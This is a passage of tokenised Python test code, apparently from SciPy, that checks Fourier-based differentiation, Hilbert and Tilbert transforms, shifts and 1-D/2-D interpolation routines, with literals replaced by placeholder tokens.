<NUM_LIT:9> * cos ( <NUM_LIT:3> * x ) ** <NUM_LIT:2> * exp ( sin ( <NUM_LIT:3> * x ) ) <EOL> d1 = diff ( f ) <EOL> assert_array_almost_equal ( d1 , df ) <EOL> assert_array_almost_equal ( diff ( df ) , ddf ) <EOL> assert_array_almost_equal ( diff ( f , <NUM_LIT:2> ) , ddf ) <EOL> assert_array_almost_equal ( diff ( ddf , - <NUM_LIT:1> ) , df ) <EOL> def test_expr_large ( self ) : <EOL> for n in [ <NUM_LIT> , <NUM_LIT> ] : <EOL> x = arange ( n ) * <NUM_LIT:2> * pi / n <EOL> f = sin ( x ) * cos ( <NUM_LIT:4> * x ) + exp ( sin ( <NUM_LIT:3> * x ) ) <EOL> df = cos ( x ) * cos ( <NUM_LIT:4> * x ) - <NUM_LIT:4> * sin ( x ) * sin ( <NUM_LIT:4> * x ) + <NUM_LIT:3> * cos ( <NUM_LIT:3> * x ) * exp ( sin ( <NUM_LIT:3> * x ) ) <EOL> ddf = - <NUM_LIT> * sin ( x ) * cos ( <NUM_LIT:4> * x ) - <NUM_LIT:8> * cos ( x ) * sin ( <NUM_LIT:4> * x ) - <NUM_LIT:9> * sin ( <NUM_LIT:3> * x ) * exp ( sin ( <NUM_LIT:3> * x ) ) + <NUM_LIT:9> * cos ( <NUM_LIT:3> * x ) ** <NUM_LIT:2> * exp ( sin ( <NUM_LIT:3> * x ) ) <EOL> assert_array_almost_equal ( diff ( f ) , df ) <EOL> assert_array_almost_equal ( diff ( df ) , ddf ) <EOL> assert_array_almost_equal ( diff ( ddf , - <NUM_LIT:1> ) , df ) <EOL> assert_array_almost_equal ( diff ( f , <NUM_LIT:2> ) , ddf ) <EOL> def test_int ( self ) : <EOL> n = <NUM_LIT:64> <EOL> x = arange ( n ) * <NUM_LIT:2> * pi / n <EOL> assert_array_almost_equal ( diff ( sin ( x ) , - <NUM_LIT:1> ) , - cos ( x ) ) <EOL> assert_array_almost_equal ( diff ( sin ( x ) , - <NUM_LIT:2> ) , - sin ( x ) ) <EOL> assert_array_almost_equal ( diff ( sin ( x ) , - <NUM_LIT:4> ) , sin ( x ) ) <EOL> assert_array_almost_equal ( diff ( <NUM_LIT:2> * cos ( <NUM_LIT:2> * x ) , - <NUM_LIT:1> ) , sin ( <NUM_LIT:2> * x ) ) <EOL> def test_random_even ( self ) : <EOL> for k in [ <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:6> ] : <EOL> for n in [ <NUM_LIT> , <NUM_LIT:32> , <NUM_LIT:64> , <NUM_LIT> , <NUM_LIT> ] : <EOL> f = random ( ( n , ) ) <EOL> af = sum ( f , axis = <NUM_LIT:0> ) / n <EOL> f = f - af <EOL> f = diff ( diff ( f , <NUM_LIT:1> ) , - <NUM_LIT:1> ) <EOL> assert_almost_equal ( sum ( f , axis = <NUM_LIT:0> ) , <NUM_LIT:0.0> ) <EOL> assert_array_almost_equal ( diff ( diff ( f , k ) , - k ) , f ) <EOL> assert_array_almost_equal ( diff ( diff ( f , - k ) , k ) , f ) <EOL> def test_random_odd ( self ) : <EOL> for k in [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> ] : <EOL> for n in [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] : <EOL> f = random ( ( n , ) ) <EOL> af = sum ( f , axis = <NUM_LIT:0> ) / n <EOL> f = f - af <EOL> assert_almost_equal ( sum ( f , axis = <NUM_LIT:0> ) , <NUM_LIT:0.0> ) <EOL> assert_array_almost_equal ( diff ( diff ( f , k ) , - k ) , f ) <EOL> assert_array_almost_equal ( diff ( diff ( f , - k ) , k ) , f ) <EOL> def test_zero_nyquist ( self ) : <EOL> for k in [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> ] : <EOL> for n in [ <NUM_LIT:32> , <NUM_LIT> , <NUM_LIT:64> , <NUM_LIT> , <NUM_LIT> ] : <EOL> f = random ( ( n , ) ) <EOL> af = sum ( f , axis = <NUM_LIT:0> ) / n <EOL> f = f - af <EOL> f = diff ( diff ( f , <NUM_LIT:1> ) , - <NUM_LIT:1> ) <EOL> assert_almost_equal ( sum ( f , axis = <NUM_LIT:0> ) , <NUM_LIT:0.0> ) <EOL> assert_array_almost_equal ( diff ( diff ( f , k ) , - k ) , f ) <EOL> assert_array_almost_equal ( diff ( diff ( f , - k ) , k ) , f ) <EOL> class TestTilbert ( TestCase ) : <EOL> def test_definition ( self ) : <EOL> for h in [ <NUM_LIT:0.1> , <NUM_LIT:0.5> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:10> ] : <EOL> for n in [ <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT:64> , <NUM_LIT> ] : <EOL> x = arange ( n ) * <NUM_LIT:2> * pi / n <EOL> y = tilbert ( sin ( x ) , h ) <EOL> y1 = direct_tilbert ( sin ( x ) , h ) <EOL> assert_array_almost_equal ( y , y1 ) <EOL> assert_array_almost_equal ( tilbert ( sin ( x ) , h ) , <EOL> direct_tilbert ( sin ( x ) , h ) ) <EOL> assert_array_almost_equal ( tilbert ( sin ( <NUM_LIT:2> * x ) , h ) , <EOL> direct_tilbert ( sin ( <NUM_LIT:2> * x ) , h ) ) <EOL> def test_random_even ( self ) : <EOL> for h in [ <NUM_LIT:0.1> , <NUM_LIT:0.5> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:10> ] : <EOL> for n in [ <NUM_LIT:32> , <NUM_LIT:64> , <NUM_LIT> ] : <EOL> f = random ( ( n , ) ) <EOL> af = sum ( f , axis = <NUM_LIT:0> ) / n <EOL> f = f - af <EOL> assert_almost_equal ( sum ( f , axis = <NUM_LIT:0> ) , <NUM_LIT:0.0> ) <EOL> assert_array_almost_equal ( direct_tilbert ( direct_itilbert ( f , h ) , h ) , f ) <EOL> def test_random_odd ( self ) : <EOL> for h in [ <NUM_LIT:0.1> , <NUM_LIT:0.5> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:10> ] : <EOL> for n in [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] : <EOL> f = random ( ( n , ) ) <EOL> af = sum ( f , axis = <NUM_LIT:0> ) / n <EOL> f = f - af <EOL> assert_almost_equal ( sum ( f , axis = <NUM_LIT:0> ) , <NUM_LIT:0.0> ) <EOL> assert_array_almost_equal ( itilbert ( tilbert ( f , h ) , h ) , f ) <EOL> assert_array_almost_equal ( tilbert ( itilbert ( f , h ) , h ) , f ) <EOL> class TestITilbert ( TestCase ) : <EOL> def test_definition ( self ) : <EOL> for h in [ <NUM_LIT:0.1> , <NUM_LIT:0.5> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:10> ] : <EOL> for n in [ <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT:64> , <NUM_LIT> ] : <EOL> x = arange ( n ) * <NUM_LIT:2> * pi / n <EOL> y = itilbert ( sin ( x ) , h ) <EOL> y1 = direct_itilbert ( sin ( x ) , h ) <EOL> assert_array_almost_equal ( y , y1 ) <EOL> assert_array_almost_equal ( itilbert ( sin ( x ) , h ) , <EOL> direct_itilbert ( sin ( x ) , h ) ) <EOL> assert_array_almost_equal ( itilbert ( sin ( <NUM_LIT:2> * x ) , h ) , <EOL> direct_itilbert ( sin ( <NUM_LIT:2> * x ) , h ) ) <EOL> class TestHilbert ( TestCase ) : <EOL> def test_definition ( self ) : <EOL> for n in [ <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT:64> , <NUM_LIT> ] : <EOL> x = arange ( n ) * <NUM_LIT:2> * pi / n <EOL> y = hilbert ( sin ( x ) ) <EOL> y1 = direct_hilbert ( sin ( x ) ) <EOL> assert_array_almost_equal ( y , y1 ) <EOL> assert_array_almost_equal ( hilbert ( sin ( <NUM_LIT:2> * x ) ) , <EOL> direct_hilbert ( sin ( <NUM_LIT:2> * x ) ) ) <EOL> def test_tilbert_relation ( self ) : <EOL> for n in [ <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT:64> , <NUM_LIT> ] : <EOL> x = arange ( n ) * <NUM_LIT:2> * pi / n <EOL> f = sin ( x ) + cos ( <NUM_LIT:2> * x ) * sin ( x ) <EOL> y = hilbert ( f ) <EOL> y1 = direct_hilbert ( f ) <EOL> assert_array_almost_equal ( y , y1 ) <EOL> y2 = tilbert ( f , h = <NUM_LIT:10> ) <EOL> assert_array_almost_equal ( y , y2 ) <EOL> def test_random_odd ( self ) : <EOL> for n in [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] : <EOL> f = random ( ( n , ) ) <EOL> af = sum ( f , axis = <NUM_LIT:0> ) / n <EOL> f = f - af <EOL> assert_almost_equal ( sum ( f , axis = <NUM_LIT:0> ) , <NUM_LIT:0.0> ) <EOL> assert_array_almost_equal ( ihilbert ( hilbert ( f ) ) , f ) <EOL> assert_array_almost_equal ( hilbert ( ihilbert ( f ) ) , f ) <EOL> def test_random_even ( self ) : <EOL> for n in [ <NUM_LIT:32> , <NUM_LIT:64> , <NUM_LIT> ] : <EOL> f = random ( ( n , ) ) <EOL> af = sum ( f , axis = <NUM_LIT:0> ) / n <EOL> f = f - af <EOL> f = diff ( diff ( f , <NUM_LIT:1> ) , - <NUM_LIT:1> ) <EOL> assert_almost_equal ( sum ( f , axis = <NUM_LIT:0> ) , <NUM_LIT:0.0> ) <EOL> assert_array_almost_equal ( direct_hilbert ( direct_ihilbert ( f ) ) , f ) <EOL> assert_array_almost_equal ( hilbert ( ihilbert ( f ) ) , f ) <EOL> class TestIHilbert ( TestCase ) : <EOL> def test_definition ( self ) : <EOL> for n in [ <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT:64> , <NUM_LIT> ] : <EOL> x = arange ( n ) * <NUM_LIT:2> * pi / n <EOL> y = ihilbert ( sin ( x ) ) <EOL> y1 = direct_ihilbert ( sin ( x ) ) <EOL> assert_array_almost_equal ( y , y1 ) <EOL> assert_array_almost_equal ( ihilbert ( sin ( <NUM_LIT:2> * x ) ) , <EOL> direct_ihilbert ( sin ( <NUM_LIT:2> * x ) ) ) <EOL> def test_itilbert_relation ( self ) : <EOL> for n in [ <NUM_LIT:16> , <NUM_LIT> , <NUM_LIT:64> , <NUM_LIT> ] : <EOL> x = arange ( n ) * <NUM_LIT:2> * pi / n <EOL> f = sin ( x ) + cos ( <NUM_LIT:2> * x ) * sin ( x ) <EOL> y = ihilbert ( f ) <EOL> y1 = direct_ihilbert ( f ) <EOL> assert_array_almost_equal ( y , y1 ) <EOL> y2 = itilbert ( f , h = <NUM_LIT:10> ) <EOL> assert_array_almost_equal ( y , y2 ) <EOL> class TestShift ( TestCase ) : <EOL> def test_definition ( self ) : <EOL> for n in [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:64> , <NUM_LIT> , <NUM_LIT:32> , <NUM_LIT> , <NUM_LIT> ] : <EOL> x = arange ( n ) * <NUM_LIT:2> * pi / n <EOL> for a in [ <NUM_LIT:0.1> , <NUM_LIT:3> ] : <EOL> assert_array_almost_equal ( shift ( sin ( x ) , a ) , direct_shift ( sin ( x ) , a ) ) <EOL> assert_array_almost_equal ( shift ( sin ( x ) , a ) , sin ( x + a ) ) <EOL> assert_array_almost_equal ( shift ( cos ( x ) , a ) , cos ( x + a ) ) <EOL> assert_array_almost_equal ( shift ( cos ( <NUM_LIT:2> * x ) + sin ( x ) , a ) , <EOL> cos ( <NUM_LIT:2> * ( x + a ) ) + sin ( x + a ) ) <EOL> assert_array_almost_equal ( shift ( exp ( sin ( x ) ) , a ) , exp ( sin ( x + a ) ) ) <EOL> assert_array_almost_equal ( shift ( sin ( x ) , <NUM_LIT:2> * pi ) , sin ( x ) ) <EOL> assert_array_almost_equal ( shift ( sin ( x ) , pi ) , - sin ( x ) ) <EOL> assert_array_almost_equal ( shift ( sin ( x ) , pi / <NUM_LIT:2> ) , cos ( x ) ) <EOL> class TestOverwrite ( object ) : <EOL> """<STR_LIT>""" <EOL> real_dtypes = [ np . float32 , np . float64 ] <EOL> dtypes = real_dtypes + [ np . complex64 , np . complex128 ] <EOL> def _check ( self , x , routine , * args , ** kwargs ) : <EOL> x2 = x . copy ( ) <EOL> routine ( x2 , * args , ** kwargs ) <EOL> sig = routine . __name__ <EOL> if args : <EOL> sig += repr ( args ) <EOL> if kwargs : <EOL> sig += repr ( kwargs ) <EOL> assert_equal ( x2 , x , err_msg = "<STR_LIT>" % sig ) <EOL> def _check_1d ( self , routine , dtype , shape , * args , ** kwargs ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> if np . issubdtype ( dtype , np . complexfloating ) : <EOL> data = np . random . randn ( * shape ) + <NUM_LIT> * np . random . randn ( * shape ) <EOL> else : <EOL> data = np . random . randn ( * shape ) <EOL> data = data . astype ( dtype ) <EOL> self . _check ( data , routine , * args , ** kwargs ) <EOL> def test_diff ( self ) : <EOL> for dtype in self . dtypes : <EOL> self . _check_1d ( diff , dtype , ( <NUM_LIT:16> , ) ) <EOL> def test_tilbert ( self ) : <EOL> for dtype in self . dtypes : <EOL> self . _check_1d ( tilbert , dtype , ( <NUM_LIT:16> , ) , <NUM_LIT> ) <EOL> def test_itilbert ( self ) : <EOL> for dtype in self . dtypes : <EOL> self . _check_1d ( itilbert , dtype , ( <NUM_LIT:16> , ) , <NUM_LIT> ) <EOL> def test_hilbert ( self ) : <EOL> for dtype in self . dtypes : <EOL> self . _check_1d ( hilbert , dtype , ( <NUM_LIT:16> , ) ) <EOL> def test_cs_diff ( self ) : <EOL> for dtype in self . dtypes : <EOL> self . _check_1d ( cs_diff , dtype , ( <NUM_LIT:16> , ) , <NUM_LIT:1.0> , <NUM_LIT> ) <EOL> def test_sc_diff ( self ) : <EOL> for dtype in self . dtypes : <EOL> self . _check_1d ( sc_diff , dtype , ( <NUM_LIT:16> , ) , <NUM_LIT:1.0> , <NUM_LIT> ) <EOL> def test_ss_diff ( self ) : <EOL> for dtype in self . dtypes : <EOL> self . _check_1d ( ss_diff , dtype , ( <NUM_LIT:16> , ) , <NUM_LIT:1.0> , <NUM_LIT> ) <EOL> def test_cc_diff ( self ) : <EOL> for dtype in self . dtypes : <EOL> self . _check_1d ( cc_diff , dtype , ( <NUM_LIT:16> , ) , <NUM_LIT:1.0> , <NUM_LIT> ) <EOL> def test_shift ( self ) : <EOL> for dtype in self . dtypes : <EOL> self . _check_1d ( shift , dtype , ( <NUM_LIT:16> , ) , <NUM_LIT:1.0> ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> run_module_suite ( ) </s>
<s> from __future__ import division , print_function , absolute_import <EOL> import itertools <EOL> import warnings <EOL> from numpy . testing import ( assert_ , assert_equal , assert_almost_equal , <EOL> assert_array_almost_equal , assert_raises , assert_array_equal , <EOL> dec , TestCase , run_module_suite , assert_allclose ) <EOL> from numpy import mgrid , pi , sin , ogrid , poly1d , linspace <EOL> import numpy as np <EOL> from scipy . _lib . six import xrange <EOL> from scipy . interpolate import ( interp1d , interp2d , lagrange , PPoly , BPoly , <EOL> ppform , splrep , splev , splantider , splint , sproot , Akima1DInterpolator , <EOL> RegularGridInterpolator , LinearNDInterpolator , NearestNDInterpolator , <EOL> RectBivariateSpline , interpn , NdPPoly ) <EOL> from scipy . special import poch , gamma <EOL> from scipy . interpolate import _ppoly <EOL> from scipy . _lib . _gcutils import assert_deallocated <EOL> from scipy . integrate import nquad <EOL> class TestInterp2D ( TestCase ) : <EOL> def test_interp2d ( self ) : <EOL> y , x = mgrid [ <NUM_LIT:0> : <NUM_LIT:2> : <NUM_LIT> , <NUM_LIT:0> : pi : <NUM_LIT> ] <EOL> z = sin ( x + <NUM_LIT:0.5> * y ) <EOL> I = interp2d ( x , y , z ) <EOL> assert_almost_equal ( I ( <NUM_LIT:1.0> , <NUM_LIT> ) , sin ( <NUM_LIT> ) , decimal = <NUM_LIT:2> ) <EOL> v , u = ogrid [ <NUM_LIT:0> : <NUM_LIT:2> : <NUM_LIT> , <NUM_LIT:0> : pi : <NUM_LIT> ] <EOL> assert_almost_equal ( I ( u . ravel ( ) , v . ravel ( ) ) , sin ( u + <NUM_LIT:0.5> * v ) , decimal = <NUM_LIT:2> ) <EOL> def test_interp2d_meshgrid_input ( self ) : <EOL> x = linspace ( <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:16> ) <EOL> y = linspace ( <NUM_LIT:0> , pi , <NUM_LIT> ) <EOL> z = sin ( x [ None , : ] + y [ : , None ] / <NUM_LIT> ) <EOL> I = interp2d ( x , y , z ) <EOL> assert_almost_equal ( I ( <NUM_LIT:1.0> , <NUM_LIT> ) , sin ( <NUM_LIT> ) , decimal = <NUM_LIT:2> ) <EOL> def test_interp2d_meshgrid_input_unsorted ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> x = linspace ( <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:16> ) <EOL> y = linspace ( <NUM_LIT:0> , pi , <NUM_LIT> ) <EOL> z = sin ( x [ None , : ] + y [ : , None ] / <NUM_LIT> ) <EOL> ip1 = interp2d ( x . copy ( ) , y . copy ( ) , z , kind = '<STR_LIT>' ) <EOL> np . random . shuffle ( x ) <EOL> z = sin ( x [ None , : ] + y [ : , None ] / <NUM_LIT> ) <EOL> ip2 = interp2d ( x . copy ( ) , y . copy ( ) , z , kind = '<STR_LIT>' ) <EOL> np . random . shuffle ( x ) <EOL> np . random . shuffle ( y ) <EOL> z = sin ( x [ None , : ] + y [ : , None ] / <NUM_LIT> ) <EOL> ip3 = interp2d ( x , y , z , kind = '<STR_LIT>' ) <EOL> x = linspace ( <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT> ) <EOL> y = linspace ( <NUM_LIT:0> , pi , <NUM_LIT:30> ) <EOL> assert_equal ( ip1 ( x , y ) , ip2 ( x , y ) ) <EOL> assert_equal ( ip1 ( x , y ) , ip3 ( x , y ) ) <EOL> def test_interp2d_eval_unsorted ( self ) : <EOL> y , x = mgrid [ <NUM_LIT:0> : <NUM_LIT:2> : <NUM_LIT> , <NUM_LIT:0> : pi : <NUM_LIT> ] <EOL> z = sin ( x + <NUM_LIT:0.5> * y ) <EOL> func = interp2d ( x , y , z ) <EOL> xe = np . array ( [ <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ] ) <EOL> ye = np . array ( [ <NUM_LIT> , <NUM_LIT> ] ) <EOL> assert_allclose ( func ( xe , ye ) , func ( xe , ye [ : : - <NUM_LIT:1> ] ) ) <EOL> assert_raises ( ValueError , func , xe , ye [ : : - <NUM_LIT:1> ] , <NUM_LIT:0> , <NUM_LIT:0> , True ) <EOL> def test_interp2d_linear ( self ) : <EOL> a = np . zeros ( [ <NUM_LIT:5> , <NUM_LIT:5> ] ) <EOL> a [ <NUM_LIT:2> , <NUM_LIT:2> ] = <NUM_LIT:1.0> <EOL> x = y = np . arange ( <NUM_LIT:5> ) <EOL> b = interp2d ( x , y , a , '<STR_LIT>' ) <EOL> assert_almost_equal ( b ( <NUM_LIT> , <NUM_LIT> ) , np . array ( [ <NUM_LIT:0.5> ] ) , decimal = <NUM_LIT:2> ) <EOL> assert_almost_equal ( b ( <NUM_LIT> , <NUM_LIT> ) , np . array ( [ <NUM_LIT:0.5> ] ) , decimal = <NUM_LIT:2> ) <EOL> def test_interp2d_bounds ( self ) : <EOL> x = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:5> ) <EOL> y = np . linspace ( <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:7> ) <EOL> z = x [ None , : ] ** <NUM_LIT:2> + y [ : , None ] <EOL> ix = np . linspace ( - <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT> ) <EOL> iy = np . linspace ( - <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT> ) <EOL> b = interp2d ( x , y , z , bounds_error = True ) <EOL> assert_raises ( ValueError , b , ix , iy ) <EOL> b = interp2d ( x , y , z , fill_value = np . nan ) <EOL> iz = b ( ix , iy ) <EOL> mx = ( ix < <NUM_LIT:0> ) | ( ix > <NUM_LIT:1> ) <EOL> my = ( iy < <NUM_LIT:0> ) | ( iy > <NUM_LIT:2> ) <EOL> assert_ ( np . isnan ( iz [ my , : ] ) . all ( ) ) <EOL> assert_ ( np . isnan ( iz [ : , mx ] ) . all ( ) ) <EOL> assert_ ( np . isfinite ( iz [ ~ my , : ] [ : , ~ mx ] ) . all ( ) ) <EOL> class TestInterp1D ( object ) : <EOL> def setUp ( self ) : <EOL> self . x5 = np . arange ( <NUM_LIT> ) <EOL> self . x10 = np . arange ( <NUM_LIT> ) <EOL> self . y10 = np . arange ( <NUM_LIT> ) <EOL> self . x25 = self . x10 . reshape ( ( <NUM_LIT:2> , <NUM_LIT:5> ) ) <EOL> self . x2 = np . arange ( <NUM_LIT> ) <EOL> self . y2 = np . arange ( <NUM_LIT> ) <EOL> self . x1 = np . array ( [ <NUM_LIT:0.> ] ) <EOL> self . y1 = np . array ( [ <NUM_LIT:0.> ] ) <EOL> self . y210 = np . arange ( <NUM_LIT> ) . reshape ( ( <NUM_LIT:2> , <NUM_LIT:10> ) ) <EOL> self . y102 = np . arange ( <NUM_LIT> ) . reshape ( ( <NUM_LIT:10> , <NUM_LIT:2> ) ) <EOL> self . y225 = np . arange ( <NUM_LIT> ) . reshape ( ( <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:5> ) ) <EOL> self . y25 = np . arange ( <NUM_LIT> ) . reshape ( ( <NUM_LIT:2> , <NUM_LIT:5> ) ) <EOL> self . y235 = np . arange ( <NUM_LIT> ) . reshape ( ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:5> ) ) <EOL> self . y325 = np . arange ( <NUM_LIT> ) . reshape ( ( <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:5> ) ) <EOL> self . fill_value = - <NUM_LIT> <EOL> def test_validation ( self ) : <EOL> interp1d ( self . x10 , self . y10 , kind = '<STR_LIT>' ) <EOL> interp1d ( self . x10 , self . y10 , kind = '<STR_LIT>' ) <EOL> interp1d ( self . x10 , self . y10 , kind = '<STR_LIT>' ) <EOL> interp1d ( self . x10 , self . y10 , kind = '<STR_LIT>' ) <EOL> interp1d ( self . x10 , self . y10 , kind = '<STR_LIT>' ) <EOL> interp1d ( self . x10 , self . y10 , kind = '<STR_LIT>' ) <EOL> interp1d ( self . x10 , self . y10 , kind = '<STR_LIT>' , fill_value = "<STR_LIT>" ) <EOL> interp1d ( self . x10 , self . y10 , kind = '<STR_LIT>' , fill_value = "<STR_LIT>" ) <EOL> interp1d ( self . x10 , self . y10 , kind = '<STR_LIT>' , fill_value = ( - <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> interp1d ( self . x10 , self . y10 , kind = '<STR_LIT>' , <EOL> fill_value = np . array ( [ - <NUM_LIT:1> ] ) ) <EOL> interp1d ( self . x10 , self . y10 , kind = '<STR_LIT>' , <EOL> fill_value = ( - <NUM_LIT:1> , ) ) <EOL> interp1d ( self . x10 , self . y10 , kind = '<STR_LIT>' , <EOL> fill_value = - <NUM_LIT:1> ) <EOL> interp1d ( self . x10 , self . y10 , kind = '<STR_LIT>' , <EOL> fill_value = ( - <NUM_LIT:1> , - <NUM_LIT:1> ) ) <EOL> interp1d ( self . x10 , self . y10 , kind = <NUM_LIT:0> ) <EOL> interp1d ( self . x10 , self . y10 , kind = <NUM_LIT:1> ) <EOL> interp1d ( self . x10 , self . y10 , kind = <NUM_LIT:2> ) <EOL> interp1d ( self . x10 , self . y10 , kind = <NUM_LIT:3> ) <EOL> interp1d ( self . x10 , self . y210 , kind = '<STR_LIT>' , axis = - <NUM_LIT:1> , <EOL> fill_value = ( - <NUM_LIT:1> , - <NUM_LIT:1> ) ) <EOL> interp1d ( self . x2 , self . y210 , kind = '<STR_LIT>' , axis = <NUM_LIT:0> , <EOL> fill_value = np . ones ( <NUM_LIT:10> ) ) <EOL> interp1d ( self . x2 , self . y210 , kind = '<STR_LIT>' , axis = <NUM_LIT:0> , <EOL> fill_value = ( np . ones ( <NUM_LIT:10> ) , np . ones ( <NUM_LIT:10> ) ) ) <EOL> interp1d ( self . x2 , self . y210 , kind = '<STR_LIT>' , axis = <NUM_LIT:0> , <EOL> fill_value = ( np . ones ( <NUM_LIT:10> ) , - <NUM_LIT:1> ) ) <EOL> for kind in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> assert_raises ( ValueError , interp1d , self . x10 , self . y10 , kind = kind , <EOL> fill_value = "<STR_LIT>" ) <EOL> assert_raises ( ValueError , interp1d , self . x25 , self . y10 ) <EOL> assert_raises ( ValueError , interp1d , self . x10 , np . array ( <NUM_LIT:0> ) ) <EOL> assert_raises ( ValueError , interp1d , self . x10 , self . y2 ) <EOL> assert_raises ( ValueError , interp1d , self . x2 , self . y10 ) <EOL> assert_raises ( ValueError , interp1d , self . x10 , self . y102 ) <EOL> interp1d ( self . x10 , self . y210 ) <EOL> interp1d ( self . x10 , self . y102 , axis = <NUM_LIT:0> ) <EOL> assert_raises ( ValueError , interp1d , self . x1 , self . y10 ) <EOL> assert_raises ( ValueError , interp1d , self . x10 , self . y1 ) <EOL> assert_raises ( ValueError , interp1d , self . x1 , self . y1 ) <EOL> assert_raises ( ValueError , interp1d , self . x10 , self . y10 , kind = '<STR_LIT>' , <EOL> fill_value = ( - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> ) ) <EOL> assert_raises ( ValueError , interp1d , self . x10 , self . y10 , kind = '<STR_LIT>' , <EOL> fill_value = [ - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> ] ) <EOL> assert_raises ( ValueError , interp1d , self . x10 , self . y10 , kind = '<STR_LIT>' , <EOL> fill_value = np . array ( ( - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> ) ) ) <EOL> assert_raises ( ValueError , interp1d , self . x10 , self . y10 , kind = '<STR_LIT>' , <EOL> fill_value = [ [ - <NUM_LIT:1> ] ] ) <EOL> assert_raises ( ValueError , interp1d , self . x10 , self . y10 , kind = '<STR_LIT>' , <EOL> fill_value = [ - <NUM_LIT:1> , - <NUM_LIT:1> ] ) <EOL> assert_raises ( ValueError , interp1d , self . x10 , self . y10 , kind = '<STR_LIT>' , <EOL> fill_value = np . array ( [ ] ) ) <EOL> assert_raises ( ValueError , interp1d , self . x10 , self . y10 , kind = '<STR_LIT>' , <EOL> fill_value = ( ) ) <EOL> assert_raises ( ValueError , interp1d , self . x2 , self . y210 , kind = '<STR_LIT>' , <EOL> axis = <NUM_LIT:0> , fill_value = [ - <NUM_LIT:1> , - <NUM_LIT:1> ] ) <EOL> assert_raises ( ValueError , interp1d , self . x2 , self . y210 , kind = '<STR_LIT>' , <EOL> axis = <NUM_LIT:0> , fill_value = ( <NUM_LIT:0.> , [ - <NUM_LIT:1> , - <NUM_LIT:1> ] ) ) <EOL> def test_init ( self ) : <EOL> assert_ ( interp1d ( self . x10 , self . y10 ) . copy ) <EOL> assert_ ( not interp1d ( self . x10 , self . y10 , copy = False ) . copy ) <EOL> assert_ ( interp1d ( self . x10 , self . y10 ) . bounds_error ) <EOL> assert_ ( not interp1d ( self . x10 , self . y10 , bounds_error = False ) . bounds_error ) <EOL> assert_ ( np . isnan ( interp1d ( self . x10 , self . y10 ) . fill_value ) ) <EOL> assert_equal ( interp1d ( self . x10 , self . y10 , fill_value = <NUM_LIT> ) . fill_value , <EOL> <NUM_LIT> ) <EOL> assert_equal ( interp1d ( self . x10 , self . y10 , fill_value = ( <NUM_LIT:1.0> , <NUM_LIT> ) ) . fill_value , <EOL> ( <NUM_LIT:1.0> , <NUM_LIT> ) ) <EOL> assert_equal ( interp1d ( self . x10 , self . y10 ) . axis , <NUM_LIT:0> ) <EOL> assert_equal ( interp1d ( self . x10 , self . y210 ) . axis , <NUM_LIT:1> ) <EOL> assert_equal ( interp1d ( self . x10 , self . y102 , axis = <NUM_LIT:0> ) . axis , <NUM_LIT:0> ) <EOL> assert_array_equal ( interp1d ( self . x10 , self . y10 ) . x , self . x10 ) <EOL> assert_array_equal ( interp1d ( self . x10 , self . y10 ) . y , self . y10 ) <EOL> assert_array_equal ( interp1d ( self . x10 , self . y210 ) . y , self . y210 ) <EOL> def test_assume_sorted ( self ) : <EOL> interp10 = interp1d ( self . x10 , self . y10 ) <EOL> interp10_unsorted = interp1d ( self . x10 [ : : - <NUM_LIT:1> ] , self . y10 [ : : - <NUM_LIT:1> ] ) <EOL> assert_array_almost_equal ( interp10_unsorted ( self . x10 ) , self . y10 ) <EOL> assert_array_almost_equal ( interp10_unsorted ( <NUM_LIT> ) , np . array ( [ <NUM_LIT> ] ) ) <EOL> assert_array_almost_equal ( interp10_unsorted ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) , <EOL> interp10 ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) ) <EOL> interp10_assume_kw = interp1d ( self . x10 [ : : - <NUM_LIT:1> ] , self . y10 [ : : - <NUM_LIT:1> ] , <EOL> assume_sorted = False ) <EOL> assert_array_almost_equal ( interp10_assume_kw ( self . x10 ) , self . y10 ) <EOL> interp10_assume_kw2 = interp1d ( self . x10 [ : : - <NUM_LIT:1> ] , self . y10 [ : : - <NUM_LIT:1> ] , <EOL> assume_sorted = True ) <EOL> assert_raises ( ValueError , interp10_assume_kw2 , self . x10 ) <EOL> interp10_y_2d = interp1d ( self . x10 , self . y210 ) <EOL> interp10_y_2d_unsorted = interp1d ( self . x10 [ : : - 